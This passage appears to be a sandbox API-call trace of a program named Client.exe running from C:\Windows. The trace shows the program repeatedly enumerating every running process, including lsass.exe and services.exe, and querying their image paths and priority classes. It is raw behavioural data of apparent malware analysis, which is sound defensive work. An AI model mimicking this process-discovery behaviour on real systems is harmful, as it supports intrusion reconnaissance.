dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", lpdwSize=0x18fd48) returned 1 [0291.965] CloseHandle (hObject=0x170) returned 1 [0291.965] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0291.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x170 [0291.965] GetPriorityClass (hProcess=0x170) returned 0x20 [0291.965] CloseHandle (hObject=0x170) returned 1 [0291.965] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x304) returned 0x170 [0291.966] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0291.969] CloseHandle (hObject=0x170) returned 1 [0291.969] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0291.973] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.974] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.975] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.976] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.978] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.979] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.980] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.980] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.981] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.982] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.983] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.984] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.985] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.986] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.987] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.988] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.988] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.989] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.990] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.991] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.036] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.037] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.038] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.040] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.041] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.041] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0292.041] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="") returned 0x0 [0292.042] CloseHandle (hObject=0x178) returned 1 [0292.042] CloseHandle (hObject=0x170) returned 1 [0292.042] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0292.042] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0292.044] CloseHandle (hObject=0x170) returned 1 [0292.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0292.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0292.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0bc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0292.044] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x304) returned 0x170 [0292.044] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0292.047] CloseHandle (hObject=0x170) returned 1 [0292.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0292.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0292.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0bc8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0292.047] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x304) returned 0x170 [0292.047] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0292.050] CloseHandle (hObject=0x170) returned 1 [0292.050] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x304) returned 0x170 [0292.050] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0292.053] CloseHandle (hObject=0x170) returned 1 [0292.053] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x304) returned 0x170 [0292.053] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0292.057] CloseHandle (hObject=0x170) returned 1 [0292.057] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0292.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0x170 [0292.057] GetPriorityClass (hProcess=0x170) returned 0x20 [0292.057] CloseHandle (hObject=0x170) returned 1 [0292.057] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x53c) returned 0x170 [0292.057] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\sppsvc.exe", lpdwSize=0x18fd44) returned 1 [0292.060] CloseHandle (hObject=0x170) returned 1 [0292.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0292.065] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.066] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.066] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.067] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.068] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.069] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.149] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.149] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.150] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.151] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.152] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.153] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.154] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.155] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.156] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.157] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.157] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.158] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.159] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.160] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.161] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.162] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.163] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.164] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.165] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.166] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0292.166] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="") returned 0x0 [0292.167] CloseHandle (hObject=0x178) returned 1 [0292.167] CloseHandle (hObject=0x170) returned 1 [0292.167] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0292.167] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0292.169] CloseHandle (hObject=0x170) returned 1 [0292.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0292.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0292.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0bf8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0292.169] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x53c) returned 0x170 [0292.169] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\sppsvc.exe", lpdwSize=0x18fd48) returned 1 [0292.172] CloseHandle (hObject=0x170) returned 1 [0292.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\sppsvc.exe", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0292.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\sppsvc.exe", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0292.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\sppsvc.exe", cchWideChar=30, lpMultiByteStr=0x9e0bf8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\sppsvc.exexe", lpUsedDefaultChar=0x0) returned 30 [0292.172] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x53c) returned 0x170 [0292.172] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\sppsvc.exe", lpdwSize=0x18fd40) returned 1 [0292.175] CloseHandle (hObject=0x170) returned 1 [0292.175] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x53c) returned 0x170 [0292.175] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\sppsvc.exe", lpdwSize=0x18fd48) returned 1 [0292.178] CloseHandle (hObject=0x170) returned 1 [0292.178] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x53c) returned 0x170 [0292.178] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\sppsvc.exe", lpdwSize=0x18fd48) returned 1 [0292.181] CloseHandle (hObject=0x170) returned 1 [0292.181] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0292.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.181] GetPriorityClass (hProcess=0x170) returned 0x20 [0292.181] CloseHandle (hObject=0x170) returned 1 [0292.182] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x804) returned 0x170 [0292.182] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwSize=0x18fd44) returned 1 [0292.184] CloseHandle (hObject=0x170) returned 1 [0292.184] 